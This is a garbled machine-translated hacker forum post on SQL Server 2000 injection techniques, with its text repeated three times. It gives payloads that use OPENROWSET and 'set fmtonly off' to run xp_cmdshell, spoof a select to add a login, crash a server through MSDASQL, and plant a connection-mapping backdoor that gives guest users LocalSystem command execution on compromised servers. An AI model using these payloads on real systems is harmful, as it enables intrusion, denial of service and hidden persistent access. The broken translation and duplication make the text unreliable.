Little-known SQL injection techniques

Skill |sql Injection

1. About OPENROWSET and OPENDATASOURCE
2. Questions about the MSDASQL two requests
3. Scary back door.

Now I'm going to talk about some of the new bugs in SQL Server, though I've been a little lucky after a long time
Ingredients, only to be found, do not dare to enjoy a single person, take out please identify.

1. About OPENROWSET and OPENDATASOURCE

It is possible that this technique has already been done before, using OPENROWSET to send local commands. Usually, we use
The law is (including MSDN's) as follows:

SELECT * FROM OPENROWSET (' SQLOLEDB ', ' myserver '; Sa '; ', ' select * from Ta '
Ble ')

Visible (even in the literal sense) OpenRowset only as a shortcut remote database access, it will
Must be followed by a select, which means that a recordset needs to be returned.

So can we use it to invoke xp_cmdshell? The answer is YES!

SELECT * FROM OPENROWSET (' SQLOLEDB ', ' server '; Sa '; ', ' Set fmtonly off

exec master.dbo.xp_cmdshel l ' dir c:\ ')

You must add set Fmtonly off to mask the default settings that return only column information, so that the xp_cmdshell
The returned output collection is submitted to the previous select display and, if the default setting is used, returns an empty set guide
An error occurred to the select and the command could not be executed.

So if we're going to call sp_addlogin, he won't return any collection like xp_cmdshell, we
You can no longer rely on the fmtonly settings, the following actions:

SELECT * FROM OPENROWSET (' SQLOLEDB ', ' server '; Sa '; ', ' select ' ' ok! '

exec master.dbo.sp_addlogin hectic ')

In this way, the command will return at least select ok! ' The collection of your machine chambers shows ok!, while each other's number
A hectic account is also added to the library, which means we use the Select ' ok! ' The Return collection spoofing
The local select request, which is the command to perform properly, sp_addsrvrolemember and Opendatasou
Rce can also be done so! As for the real use of this method, let's think it over.

2. Questions about the MSDASQL two requests

I do not know if you have tried to connect the remote database with MSDASQL, of course, this API must be SQL Server
Administrator can only call, then the following:

SELECT * FROM OPENROWSET (' Msdasql ', ' Driver={sql server};server=server;ad
dress=server,1433;uid=sa;pwd=;d atabase=master;network=dbmssocn ', ' s

Elect * FROM table1 SELECT * from Table2 ')

When the number of Table1 and table2 fields is not the same, you will find that each other's SQL Server crashes, even the local
Connection will fail, and system resources are taking up all normal, after killing the SQL Server process with PsKill, if not heavy
startup machine, SQL Server either fails to start properly, or is often illegal, and I just happened to find this.
Bug, the specific reason I haven't figured out, and it's strange that this phenomenon only appears on MSDASQL, Sqlole
DB does not have this problem, it seems that the problem is not the number of requests and the number of return set does not match, should also
Is the problem of MSDASQL itself, specific reasons, we study together slowly.

3. Scary back door.

I used to see someone on the internet saying that you can leave the back door on SQL Server by adding Triger, jobs, or overwrite SP
_addlogin and Sp_addsrvrolemember do this, of course, but it's easy to find out. No
Know if anyone's ever thought about SQLOLEDB local connection mapping. Oh, for example, you use s on each other's SQL Server
The Qlserver Administrator account performs the following command:

SELECT * FROM OPENROWSET (' SQLOLEDB ', ' Trusted_connection=yes;data source=
Hectic ', ' set fmtonly off exec master. xp_cmdshell ' dir c:\ ')

This creates a local connection map named hectic on each other's SQL Server, as long as the Sqlserve
R does not reboot, this mapping will continue to exist, at least I do not know how to find the connection map that others put
, well, after the above command runs, you will find that even if SQL Server does not have any permissions on the guest user,
Run the above command as well! and permission is localsystem!. (default installation) hehe! This one
Method can be used to leave a backdoor on SQL Server that has been hacked to get administrator privileges. The above method
Through the sqlserver2000 SQLSERVER2000SP1!

There is also a guess, do not know if you have not noticed that Windows default shipped with two DSN, one is
LocalServer One is MSQI, these two are established when the local Administrator account connection to SQL Server, such as
If the other SQL Server is started by a custom power user, then the SA's permissions and power User One
Kind, it's hard to do something big, but we're going to pass the following order:

SELECT * FROM OPENROWSET

(' Msdasql ', ' dsn=locaserver;trusted_connection=yes ', ' Set fmtonly off exec


Master.. xp_cmdshell ' dir c:\ ')

You should be able to use the LocalServer administrator account to connect to local SQL Server and then take this account right
Limited to execute the local command, this is the post I think should be able to break through the SA Power User permissions. Now the problem is sq
Loledb cannot invoke a DSN connection, and MSDASQL is not allowed to call, so I'm looking for a guest call
The Msdasql method.

If someone knows how to break a bug or have a new idea, we can talk about this issue
If you can successfully be used by the guest, it will be a very serious security vulnerabilities. Because any of the SQL we mentioned earlier
Statements can be submitted to each other's ASP to help us execute.



Now I'm going to talk about some of the new bugs in SQL Server, though I've been a little lucky after a long time
Ingredients, only to be found, do not dare to enjoy a single person, take out please identify. 1. About OPENROWSET and O
Pendatasource It is possible that someone has already done this trick by using OPENROWSET to send local commands. Flux
Often our usage is (including MSDN's) as follows ...

Now I'm going to talk about some of the new bugs in SQL Server, although I've been a little lucky after a long period of hard work.
Transport components, only to be found, dare not a person to enjoy alone, take out please identify.

1. About OPENROWSET and OPENDATASOURCE

It is possible that this technique has already been done before, using OPENROWSET to send local commands. Usually, we use
The law is (including MSDN's) as follows:

SELECT * FROM OPENROWSET (' SQLOLEDB ', ' myserver '; Sa '; ', ' select * from Ta '
Ble ')

Visible (even in the literal sense) OpenRowset only as a shortcut remote database access, it will
Must be followed by a select, which means that a recordset needs to be returned.

So can we use it to invoke xp_cmdshell? The answer is YES!

SELECT * FROM OPENROWSET (' SQLOLEDB ', ' server '; Sa '; ', ' Set fmtonly off

exec master.dbo.xp_cmdshel l ' dir c:\ ')

You must add set Fmtonly off to mask the default settings that return only column information, so that the xp_cmdshell
The returned output collection is submitted to the previous select display and, if the default setting is used, returns an empty set guide
An error occurred to the select and the command could not be executed.

So if we're going to call sp_addlogin, he won't return any collection like xp_cmdshell, we
You can no longer rely on the fmtonly settings, the following actions:

SELECT * FROM OPENROWSET (' SQLOLEDB ', ' server '; Sa '; ', ' select ' ' ok! '

exec master.dbo.sp_addlogin hectic ')

In this way, the command will return at least select ok! ' The collection of your machine chambers shows ok!, while each other's number
A hectic account is also added to the library, which means we use the Select ' ok! ' The Return collection spoofing
The local select request, which is the command to perform properly, sp_addsrvrolemember and Opendatasou
Rce can also be done so! As for the real use of this method, let's think it over.

2. Questions about the MSDASQL two requests

I do not know if you have tried to connect the remote database with MSDASQL, of course, this API must be SQL Server
Administrator can only call, then the following:

SELECT * FROM OPENROWSET (' Msdasql ', ' Driver={sql server};server=server;ad
dress=server,1433;uid=sa;pwd=;d atabase=master;network=dbmssocn ', ' s

Elect * FROM table1 SELECT * from Table2 ')

When the number of Table1 and table2 fields is not the same, you will find that each other's SQL Server crashes, even the local
Connection will fail, and system resources are taking up all normal, after killing the SQL Server process with PsKill, if not heavy
startup machine, SQL Server either fails to start properly, or is often illegal, and I just happened to find this.
Bug, the specific reason I haven't figured out, and it's strange that this phenomenon only appears on MSDASQL, Sqlole
DB does not have this problem, it seems that the problem is not the number of requests and the number of return set does not match, should also
Is the problem of MSDASQL itself, specific reasons, we study together slowly.

3. Scary back door.

I used to see someone on the internet saying that you can leave the back door on SQL Server by adding Triger, jobs, or overwrite SP
_addlogin and Sp_addsrvrolemember do this, of course, but it's easy to find out. No
Know if anyone's ever thought about SQLOLEDB local connection mapping. Oh, for example, you use s on each other's SQL Server
The Qlserver Administrator account performs the following command:

SELECT * FROM OPENROWSET (' SQLOLEDB ', ' Trusted_connection=yes;data source=
Hectic ', ' set fmtonly off exec master. xp_cmdshell ' dir c:\ ')

This creates a local connection map named hectic on each other's SQL Server, as long as the Sqlserve
R does not reboot, this mapping will continue to exist, at least I do not know how to find the connection map that others put
, well, after the above command runs, you will find that even if SQL Server does not have any permissions on the guest user,
Run the above command as well! and permission is localsystem!. (default installation) hehe! This one
Method can be used to leave a backdoor on SQL Server that has been hacked to get administrator privileges. The above method
Through the sqlserver2000 SQLSERVER2000SP1!

There is also a guess, do not know if you have not noticed that Windows default shipped with two DSN, one is
LocalServer One is MSQI, these two are established when the local Administrator account connection to SQL Server, such as
If the other SQL Server is started by a custom power user, then the SA's permissions and power User One
Kind, it's hard to do something big, but we're going to pass the following order:

SELECT * FROM OPENROWSET

(' Msdasql ', ' dsn=locaserver;trusted_connection=yes ', ' Set fmtonly off exec


Master.. xp_cmdshell ' dir c:\ ')

You should be able to use the LocalServer administrator account to connect to local SQL Server and then take this account right
Limited to execute the local command, this is the post I think should be able to break through the SA Power User permissions. Now the problem is sq
Loledb cannot invoke a DSN connection, and MSDASQL is not allowed to call, so I'm looking for a guest call
The Msdasql method.

If someone knows how to break a bug or have a new idea, we can talk about this issue
If you can successfully be used by the guest, it will be a very serious security vulnerabilities. Because any of the SQL we mentioned earlier
Statements can be submitted to each other's ASP to help us execute.